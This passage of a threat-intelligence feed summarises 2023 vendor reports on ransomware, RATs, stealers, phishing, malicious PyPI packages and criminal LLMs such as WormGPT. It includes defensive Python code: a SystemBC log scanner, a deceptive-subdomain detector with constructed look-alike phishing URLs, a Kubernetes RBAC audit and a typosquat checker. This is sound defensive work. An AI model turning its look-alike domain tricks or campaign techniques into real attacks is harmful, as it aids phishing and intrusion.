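def scan_access_log(text: str) -> dict:
    """Return {client_ip: [(timestamp, method, path, status), ...]} for requests
    whose path matches a SystemBC indicator. The status is kept on purpose: a 404
    still shows that the client was probing for the panel."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if any(p.search(path) for p in SUSPICIOUS_PATHS):
            hits[m.group("ip")].append(
                (m.group("ts"), m.group("method"), path, int(m.group("status")))
            )
    return dict(hits)


if __name__ == "__main__":
    for ip, requests in scan_access_log(SAMPLE_LOG).items():
        print(ip, requests)
```

Feed it `cat /var/log/apache2/access.log` (or the nginx equivalent) and the resulting IPs are candidates for enrichment against ASN and reputation data, which is the step the diary performed by hand.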
—
- Intel Source:
- QuickHeal
- Intel Name:
- Diving_Deep_into_Darkrace_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Quick Heal researchers describe how DarkRace ransomware incorporates LockBit’s strategies, demonstrating how cybercriminals reuse tried-and-tested techniques to strengthen their attacks and increase damage. Combining these strategies could increase infections, compromise more data and escalate ransom demands.
Source:
https://blogs.quickheal.com/darkrace-ransomware-a-deep-dive-into-its-techniques-and-impact/
—
- Intel Source:
- QuickHeal
- Intel Name:
- Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Quick Heal have found that the Mallox (also known as TargetCompany) ransomware is currently using unprotected Microsoft SQL Servers as an attack vector to enter victims’ systems and spread.
Source:
https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/
—
- Intel Source:
- Fortinet
- Intel Name:
- NoCry_and_Trash_Panda_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Researchers from Fortinet looked into Trash Panda and a new, small NoCry ransomware variant. Trash Panda, a Windows-based ransomware, was first seen in the first days of August; on infected computers it encrypts files, changes the desktop background and drops a ransom note containing political statements. NoCry, also Windows ransomware, was first identified in April 2021; its creators produce variants that are then offered for sale on the group’s Telegram channel.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-trash-panda-and-nocry-variant
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Tool_Deployed_by_Cuba_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have discovered and documented new tools used by the Cuba ransomware threat group. It is currently in the fourth year of its operation and shows no sign of slowing down. In the first half of 2023 alone, the operators behind Cuba ransomware were the perpetrators of several high-profile attacks across disparate industries.
—
- Intel Source:
- Lumen
- Intel Name:
- HiatusRAT_Returns_To_Action_After_A_Short_Break
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Lumen researchers have continued to track the threat actor, uncovering new malware samples and infrastructure associated with the HiatusRAT cluster. In the latest campaign they observed a shift in reconnaissance and targeting activity.
—
- Intel Source:
- eSentire
- Intel Name:
- StealC_Delivering_via_Deceptive_Google_Sheets
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers at eSentire traced an infection to a malicious advertisement shown to the user while trying to download Google Sheets. The ad led to a malicious website hosting a downloader for the StealC infostealer.
Source:
https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_a_Zalando_Phishing_to_a_RAT
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have seen a wave of phishing emails targeting Zalando customers that ultimately leads to a RAT.
Source:
https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Gozi_Malware_Launches_Another_Attack
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- Researchers at IBM Security Intelligence have noticed that the Gozi malware has returned and is now focusing on cryptocurrency platforms, banks, and other financial institutions.
Source:
https://securityintelligence.com/posts/gozi-strikes-again-targeting-banks-cryptocurrency-and-more/
—
- Intel Source:
- Sysdig
- Intel Name:
- Malicious_Campaign_Targeting_GitLab
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team discovered a new, financially motivated operation, dubbed LABRAT, that targets GitLab servers for cryptojacking and proxyjacking. The operation stands out for the attacker’s emphasis on stealth and defense evasion.
Source:
https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
—
- Intel Source:
- Security Affairs
- Intel Name:
- Massive_phishing_campaign_targets_energy_sector
- Date of Scan:
- 2023-08-17
- Impact:
- MEDIUM
- Summary:
- Since May 2023, researchers from Cofense have observed a massive phishing campaign that uses QR codes to steal the Microsoft credentials of users across multiple industries. One of the targeted organizations is a notable energy company in the US.
Source:
https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html?amp=1
—
- Intel Source:
- Welivesecurity
- Intel Name:
- A_new_phishing_campaign_targeting_Zimbra_users
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- ESET researchers have uncovered a mass-spreading phishing campaign, aimed at collecting Zimbra account users’ credentials, active since at least April 2023 and still ongoing. Zimbra Collaboration is an open-core collaborative software platform and a popular alternative to enterprise email solutions. The campaign is mass-spreading; its targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the greatest number of targets are located in Poland, followed by Ecuador and Italy. To date, ESET has not attributed this campaign to any known threat actor.
Source:
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/
—
- Intel Source:
- ASEC
- Intel Name:
- Hakuna_Matata_ransomware
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- ASEC researchers have recently discovered the Hakuna Matata ransomware being used to attack Korean companies. Hakuna Matata is a recent ransomware family first identified in July 2023 on Twitter; later that month a dark-web post by a threat actor using Hakuna Matata was also shared on Twitter. Among the strains uploaded to VirusTotal, a file uploaded on July 2nd, 2023 is confirmed to be the first case.
—
- Intel Source:
- Cyberint
- Intel Name:
- Raccoon_Stealer_Malware_Returns
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyberint researchers have seen that the developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. It is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors.
Source:
https://cyberint.com/blog/financial-services/raccoon-stealer/
—
- Intel Source:
- Trustwave
- Intel Name:
- The_rise_of_LLM_engines_WormGPT_and_FraudGPT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Trustwave researchers discussed two malicious LLM engines offered for sale on underground forums, WormGPT and FraudGPT. If criminals obtain their own ChatGPT-like tool, the implications for cybersecurity, social engineering and overall digital safety could be severe. The prospect highlights the importance of vigilance in securing, and responsibly developing, artificial intelligence technology in order to mitigate potential risks and safeguard against misuse.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wormgpt-and-fraudgpt-the-rise-of-malicious-llms/
https://netenrich.com/blog/fraudgpt-the-villain-avatar-of-chatgpt
—
- Intel Source:
- Uptycs
- Intel Name:
- QwixxRAT_aka_Telegram_RAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- The Uptycs researchers discovered QwixxRAT (aka Telegram RAT) in early August 2023. The threat actor is widely distributing their malicious tool through Telegram and Discord platforms. Once installed on the victim’s Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker’s Telegram bot, providing them with unauthorized access to the victim’s sensitive information.
Source:
https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram
—
- Intel Source:
- Netskope
- Intel Name:
- Phishing_Campaign_Steals_Cloud_Credentials
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Over the last couple of months, Netskope Threat Labs analysts have monitored a 61-fold increase in traffic to phishing pages hosted on Cloudflare R2. Most of the campaigns target Microsoft login credentials, although some pages target Adobe, Dropbox and other cloud apps. The attacks mainly hit victims in North America and Asia across different segments, led by the technology, financial services and banking sectors.
—
- Intel Source:
- Cyble
- Intel Name:
- Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyble researchers have recently come across a novel approach for spreading SectopRAT: the SectopRAT payload is delivered by the Amadey bot, which is itself retrieved by the LummaC stealer.
Source:
https://cyble.com/blog/lummac-stealer-leveraging-amadey-bot-to-deploy-sectoprat/
—
- Intel Source:
- AT&T
- Intel Name:
- The_Shadow_Nexus_of_Malware_and_Proxy_Application
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Researchers from AT&T Alien Labs found a significant campaign distributing a proxy server application to Windows computers. They also identified a proxy service provider whose proxy requests are routed through compromised systems that malware has turned into residential exit nodes.
—
- Intel Source:
- HP ThreatResearch
- Intel Name:
- The_malware_campaigns_use_a_variety_of_programming_languages
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- In the last couple of months, the HP Threat Research team has noticed a surge of finance-themed malicious spam campaigns spreading malware through batch scripts (.bat). The campaigns use a wide variety of programming languages to achieve different objectives within the infection chain, from batch scripts and PowerShell to Go, shellcode and .NET.
Source:
https://threatresearch.ext.hp.com/do-you-speak-multiple-languages-malware-does/
—
- Intel Source:
- Fortinet
- Intel Name:
- Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- The Python Package Index (PyPI) has become a common place for threat actors to post malware that unsuspecting victims may download. FortiGuard Labs analysts have been monitoring this attack vector for some time and have posted an update on the zero-day attacks they have discovered, including several new malicious PyPI packages.
Source:
https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi
—
- Intel Source:
- Trellix
- Intel Name:
- NetSupportRAT_exploring_new_techniques
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Trellix researchers observed a new campaign using fake Chrome browser updates to trick victims into installing a remote administration tool called NetSupport Manager. The threat actors abuse this software to steal information and take control of victim computers. The campaign resembles the previously reported SocGholish campaign, which was run by a suspected Russian threat actor.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Stealthy_Malicious_MSI_Loader
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Cyfirma researchers have observed a disguised, stealthy MSI loader being advertised on dark web forums by a Russian threat actor, who claims it can evade detection by both VirusTotal scans and Windows Defender. The researchers’ investigation also established a link between this MSI loader and the BatLoader campaign observed in March 2023, suggesting potential coordination between the two.
—
- Intel Source:
- Akamai
- Intel Name:
- New_Magento_Campaign_Discovered_called_Xurum
- Date of Scan:
- 2023-08-14
- Impact:
- LOW
- Summary:
- Over the past few months, Akamai has been closely monitoring a focused campaign that specifically targets a relatively small number of Magento deployments. They dubbed the campaign Xurum to reference the domain name of the C2 server utilized by the attacker.
Source:
https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell
—
- Intel Source:
- Zscaler
- Intel Name:
- Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- Zscaler ThreatLabz has unveiled JanelaRAT, a newly discovered threat focused primarily on the Latin American (LATAM) financial sector. The malware employs techniques including DLL side-loading and dynamic command-and-control infrastructure, and its capabilities range from evasive maneuvers to self-defense mechanisms, all aimed at compromising sensitive financial data. Portuguese strings in its code and a Portuguese-speaking developer point to its origins and targeted region.
—
- Intel Source:
- Trendmicro
- Intel Name:
- Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observe the Monti ransomware group, resembling Conti, resumes attacks on legal and government sectors with a fresh Linux variant. Unlike previous versions, this variant modifies encryption methods, uses an infection marker, and alters system files.
—
- Intel Source:
- CERT UA
- Intel Name:
- Phishing_Attack_Targeting_Government_Agencies
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has identified a phishing attack on government agencies involving fraudulent emails, purporting to come from CERT-UA, that urge a password change through a malicious link. The attackers imitate Roundcube’s interface and use a deceptive subdomain.
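The “deceptive subdomain” trick places the trusted name in the left-hand labels of a host the attacker controls, so the browser’s address bar starts with something familiar. The following is an added example (not code from the CERT-UA advisory) of the check a mail filter or link-scanner can apply: compute the registrable domain of the link’s host and compare it with the trusted domain instead of looking for the brand anywhere in the URL. The trusted domain `cert-ua.gov.ua` is CERT-UA’s real domain; the small public-suffix table and the sample links are assumptions constructed for this example.

```python
from urllib.parse import urlsplit

# Tiny stand-in for the Public Suffix List (assumption for this example). A real
# check should load the full list so that suffixes like gov.ua are recognised.
MULTI_LABEL_SUFFIXES = {"gov.ua", "com.ua", "org.ua", "co.uk", "org.uk", "com.au"}


def registrable_domain(host: str) -> str:
    """The domain somebody actually had to register: the last two labels, or the
    last three when the last two form a public suffix such as gov.ua."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify_link(url: str, trusted_domains) -> str:
    """'trusted'   : the registrable domain is one of trusted_domains
                     (so genuine subdomains such as mail.<trusted> pass);
       'deceptive' : a trusted name, or its brand label, appears in the host but
                     the registrable domain belongs to someone else;
       'unrelated' : none of the trusted names appear at all."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return "unrelated"
    trusted = {t.lower() for t in trusted_domains}
    if registrable_domain(host) in trusted:
        return "trusted"
    for t in trusted:
        brand = t.split(".")[0]  # e.g. "cert-ua" from "cert-ua.gov.ua"
        if t in host or brand in host:
            return "deceptive"
    return "unrelated"


TRUSTED = {"cert-ua.gov.ua"}

# Constructed links for this example, not the URLs from the advisory.
SAMPLE_LINKS = [
    "https://cert-ua.gov.ua/article/1",
    "https://mail.cert-ua.gov.ua/",
    "https://cert-ua.gov.ua.example.net/roundcube/?_task=mail",
    "https://cert-ua-gov-ua.example.com/reset",
    "https://example.org/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(f"{classify_link(link, TRUSTED):10} {link}")
```

The brand-substring test is deliberately crude and will miss hosts that drop the hyphen or use homoglyphs; the point that survives those limitations is that the decision is made on the registrable domain, never on the leading labels.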
—
- Intel Source:
- CISA
- Intel Name:
- Updates_on_SEASPY_and_WHIRLPOOL_Backdoors
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- The US Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis report on malware recovered from compromised Barracuda Email Security Gateway (ESG) appliances. CISA obtained four malware samples, including the SEASPY and WHIRLPOOL backdoors. The appliances were compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting ESG versions 5.1.3.001-9.2.0.006.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-221a
—
- Intel Source:
- Sucuri
- Intel Name:
- The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery
- Date of Scan:
- 2023-08-12
- Impact:
- LOW
- Summary:
- This month, Sucuri analysts traced a noticeable surge in malware linked to a malicious payload delivery system known as Gootloader. The group behind it is believed to run a malware-as-a-service operation, exclusively providing a delivery service for other threat actors. In their blog, Sucuri discusses why Gootloader is so effective, details its inner workings and sheds light on the tactics employed by its operators.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_SugarCRM_CVE_2023_22952_zero_day_vulnerability
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- A zero-day vulnerability in the SugarCRM customer relationship management platform was used by threat actors to gain access to customers’ AWS accounts, according to a report from Palo Alto Networks Unit 42.
Source:
https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/
—
- Intel Source:
- SOCRadar
- Intel Name:
- A_new_cybercriminals_service_called_Dark_Utilities
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- Cisco Talos observed malware samples in the wild using the Dark Utilities service to establish C2 communication channels and remote access capabilities on infected systems; the malware targeted both Windows and Linux systems. SOCRadar summarizes the platform in its blog.
Source:
https://socradar.io/dark-utilities-platform-provides-c2-server-for-threat-actors/
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs have discovered a new Rust-written injector that delivers XWorm and shellcode into a victim’s environment, and their investigation showed a sharp rise in injector activity in May 2023. To evade antivirus detection, the shellcode can be encrypted with AES or RC4, compressed with LZMA, and Base64-encoded.
Source:
https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter
—
- Intel Source:
- Securelist
- Intel Name:
- Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Securelist researchers have seen a new SystemBC variant, DroxiDat, deployed against a critical infrastructure target. This time, the proxy-capable backdoor was deployed alongside Cobalt Strike beacons in the critical infrastructure of a southern African nation.
Source:
https://securelist.com/focus-on-droxidat-systembc/110302/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- MoustachedBouncer_cyberespionage_activity_against_diplomats
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- MoustachedBouncer is a cyberespionage group, discovered by ESET Research, that has been active since at least 2014 and targets diplomats. WeLiveSecurity researchers believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its adversary-in-the-middle (AitM) operations.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Common_TTPs_of_attacks_against_industrial_organizations
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Kaspersky ICS Cert analysts identified over 15 implants and their variants planted by the threat actor(s) in various combinations. The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems. Analysts have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in their report.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- The Cyble Research and Intelligence Labs have discovered a fresh method of infection that is used to spread STRRAT. This novel approach entails disseminating STRRAT version 1.6, which makes use of two string obfuscation strategies.
Source:
https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/
—
- Intel Source:
- ASEC
- Intel Name:
- Changes_in_CHM_Malware_Distribution
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- ASEC has previously covered a CHM malware type impersonating Korean financial institutes and insurance companies. Recently, the execution method of this malware has been changing every week. The ASEC post covers how the changed execution processes of the CHM malware are recorded in AhnLab’s EDR products.
—
- Intel Source:
- Sucuri
- Intel Name:
- Hybrid_malware_leveraging_various_internet_protocols
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Sucuri analysts periodically find unusual hybrid malware that leverages several internet protocols. During a recent investigation, they found a piece of JavaScript malware that indirectly uses the DNS protocol to obtain its redirect URLs.
—
- Intel Source:
- Sentinelone
- Intel Name:
- In_Depth_Analysis_of_LOLKEK_Payloads
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from SentinelLabs have examined sample sets of LOLKEK payloads. Small to medium-sized businesses (SMBs) and individual users are typically its main targets.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Zero_Day_Exploit_Case_Study_CVE_2023_36874
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- In July 2023, the CrowdStrike Falcon Complete team observed a previously unknown exploit for an unknown vulnerability in the Windows Error Reporting (WER) component. CrowdStrike reported its findings to Microsoft, which assigned the identifier CVE-2023-36874 to the vulnerability.
Source:
https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Campaign_Against_NATO_Aligned_Foreign_Ministries
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- Two PDF documents have been spotted, and EclecticIQ researchers believe with high confidence that they are a part of a continuous campaign aimed at NATO member countries’ foreign ministries. The PDF files contained two fake diplomatic invitations that appeared to be coming from the German embassy.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Attackers_Using_EvilProxy_Phishing_Kit
- Date of Scan:
- 2023-08-10
- Impact:
- HIGH
- Summary:
- Threat actors have been using the phishing toolkit EvilProxy to take control of cloud-based Microsoft 365 accounts belonging to executives at prominent companies. Researchers said the attacks show both the prevalence of pre-packaged phishing-as-a-service toolkits and the increasing use of multi-factor authentication bypass to gain access to accounts.
—
- Intel Source:
- AT&T
- Intel Name:
- AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild.
Source:
https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload
—
- Intel Source:
- ASEC
- Intel Name:
- Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered instances in which GuLoader was sent as an email attachment falsely labeled as a shipping statement or tax invoice. The newly discovered GuLoader variant was delivered inside a RAR (Roshal Archive) compressed file. When run by a user, GuLoader eventually downloads well-known malware strains including Remcos, AgentTesla and Vidar.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Injection
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Magniber ransomware continues to be distributed in high volumes. For the past few years it spread through an Internet Explorer vulnerability, but since the browser’s support ended that vulnerability is no longer exploited. Recently the ransomware has been spreading through the Chrome and Edge browsers using filenames that impersonate Windows security update packages (such as ERROR.Center.Security.msi). Currently, Magniber injects the ransomware into a running process, which then encrypts the user’s files.
—
- Intel Source:
- Aquasec
- Intel Name:
- Kubernetes_Exposed
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- A hijacked Kubernetes (k8s) cluster can be catastrophic for its owner. Aquasec researchers investigated and uncovered Kubernetes clusters belonging to more than 350 organizations, open-source projects and individuals that were openly accessible and largely unprotected. At least 60% of them had been breached and hosted an active campaign deploying malware and backdoors.
Source:
https://blog.aquasec.com/kubernetes-exposed-one-yaml-away-from-disaster
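An “openly accessible” cluster usually comes down to RBAC that grants anonymous callers more than the default discovery role. The following added example (not code from Aqua’s report) audits the output of `kubectl get clusterrolebindings -o json` for bindings whose subjects are `system:anonymous` or `system:unauthenticated` and whose role is anything beyond `system:public-info-viewer`, the role Kubernetes itself binds to unauthenticated callers. The binding list is constructed for this example; the severity labels are this example’s own convention.

```python
import json

# Constructed `kubectl get clusterrolebindings -o json` output for this example
# (shapes follow rbac.authorization.k8s.io/v1; not data from Aqua's report).
SAMPLE_BINDINGS = json.loads("""
{
  "kind": "List",
  "items": [
    {"metadata": {"name": "system:public-info-viewer"},
     "roleRef": {"kind": "ClusterRole", "name": "system:public-info-viewer"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"},
                  {"kind": "Group", "name": "system:unauthenticated"}]},
    {"metadata": {"name": "cluster-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"metadata": {"name": "anon-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "User", "name": "system:anonymous"}]},
    {"metadata": {"name": "everyone-can-read"},
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "Group", "name": "system:unauthenticated"}]},
    {"metadata": {"name": "no-subjects"},
     "roleRef": {"kind": "ClusterRole", "name": "edit"}}
  ]
}
""")

# Subjects that every unauthenticated request to the API server matches.
ANONYMOUS_SUBJECTS = {("User", "system:anonymous"), ("Group", "system:unauthenticated")}

# Kubernetes binds this role to system:unauthenticated by default; it only exposes
# /healthz, /livez, /readyz and /version. Anything beyond it is a finding.
DEFAULT_ANONYMOUS_ROLES = frozenset({"system:public-info-viewer"})


def audit_anonymous_bindings(bindings: dict, allowed_roles=DEFAULT_ANONYMOUS_ROLES) -> list:
    """Return one finding per (binding, role, subject) that grants anonymous
    callers anything beyond the roles in allowed_roles."""
    findings = []
    for binding in bindings.get("items", []):
        role = binding.get("roleRef", {}).get("name", "")
        for subject in binding.get("subjects") or []:  # "subjects" may be absent
            key = (subject.get("kind"), subject.get("name"))
            if key in ANONYMOUS_SUBJECTS and role not in allowed_roles:
                findings.append({
                    "binding": binding["metadata"]["name"],
                    "role": role,
                    "subject": subject["name"],
                    # severity convention of this example, not of Kubernetes
                    "severity": "critical" if role == "cluster-admin" else "high",
                })
    return findings


if __name__ == "__main__":
    for finding in audit_anonymous_bindings(SAMPLE_BINDINGS):
        print(finding)
```

Run it against a live cluster with `kubectl get clusterrolebindings -o json | python3 audit.py` after replacing `SAMPLE_BINDINGS` with `json.load(sys.stdin)`. Namespaced `RoleBinding` objects deserve the same pass, and the API server flag `--anonymous-auth=false` removes the anonymous identity altogether where the health endpoints are not needed unauthenticated.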
—
- Intel Source:
- Cyble
- Intel Name:
- The_AgentTesla_malware_attack
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed, multi-stage process. The campaign is designed to trick unsuspecting users into opening tax-related documents and the accompanying Control Panel files (.cpl).
Source:
https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/
—
- Intel Source:
- Zscaler
- Intel Name:
- New_InfoStealer_Named_Statc_Stealer
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have discovered a new information stealer family called Statc Stealer. It is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.
Source:
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI
- Date of Scan:
- 2023-08-09
- Impact:
- MEDIUM
- Summary:
- Researchers from ReversingLabs identified a persistent campaign that leverages malicious Python packages on PyPI to deceive developers. The attackers mimic popular open-source tools and embed hidden malicious code, create matching GitHub repositories for credibility, and employ dynamic command-and-control URLs.
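Both PyPI entries above (FortiGuard’s and this one from ReversingLabs) describe packages that mimic popular tools. The following added example, which is neither vendor’s code, shows the check a CI pipeline or dependency review can run before `pip install`: normalize the requested name per PEP 503, strip the affixes attackers bolt onto real names (`python-requests`, `requests3`), and flag anything within a small edit distance of a known popular package. The popular-package list is a short assumption for this example; a real deployment would load the top-downloads list.

```python
import re

# Popular package names to compare against. A real deployment would pull the
# top-N downloads list; this short list is an assumption for the example.
POPULAR_PACKAGES = [
    "requests", "urllib3", "numpy", "pandas", "boto3", "setuptools",
    "cryptography", "pyyaml", "colorama", "beautifulsoup4", "pillow",
]


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of -, _ and . to a hyphen."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) with a single-row DP table."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def name_variants(n: str) -> set:
    """Strip the affixes squatters add to a genuine name: python-requests, requests3."""
    out = {n}
    for pre in ("python-", "py-"):
        if n.startswith(pre) and len(n) > len(pre):
            out.add(n[len(pre):])
    for suf in ("-python", "-py"):
        if n.endswith(suf) and len(n) > len(suf):
            out.add(n[:-len(suf)])
    stripped = n.rstrip("0123456789")
    if stripped:
        out.add(stripped)
    return out


def typosquat_candidates(name: str, known=POPULAR_PACKAGES, max_distance: int = 2) -> list:
    """Return [(known_name, distance), ...], closest first, for every popular
    package that `name` is suspiciously close to. An exact normalised match
    returns [] because it is the genuine package."""
    n = normalize(name)
    known_norm = {normalize(k): k for k in known}
    if n in known_norm:
        return []
    results = []
    for kn, original in known_norm.items():
        d = min(levenshtein(v, kn) for v in name_variants(n))
        if d <= max_distance:
            results.append((original, d))
    return sorted(results, key=lambda r: (r[1], r[0]))


if __name__ == "__main__":
    for candidate in ("requests", "reqeusts", "python-requests", "colourama", "django"):
        print(f"{candidate:16} -> {typosquat_candidates(candidate)}")
```

A distance-0 hit means the name is a known package wrapped in an affix, which is the pattern the ReversingLabs entry describes; distances of 1 or 2 catch transpositions and regional spellings. Short names need a tighter threshold than long ones, so in practice scale `max_distance` with the length of the known name.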
—
- Intel Source:
- Cyble
- Intel Name:
- Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed a new tech scam campaign in which scammers set up a site for a non-existent antivirus product to deceive users into paying for non-existent services. During analysis, the researchers discovered various ransomware variants, built with leaked ransomware builders, that the scammers leveraged in their fraudulent schemes.
Source:
https://cyble.com/blog/utilization-of-leaked-ransomware-builders-in-tech-related-scams/
—
- Intel Source:
- ASEC
- Intel Name:
- The_Malware_distribution_as_Coin_exchange
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
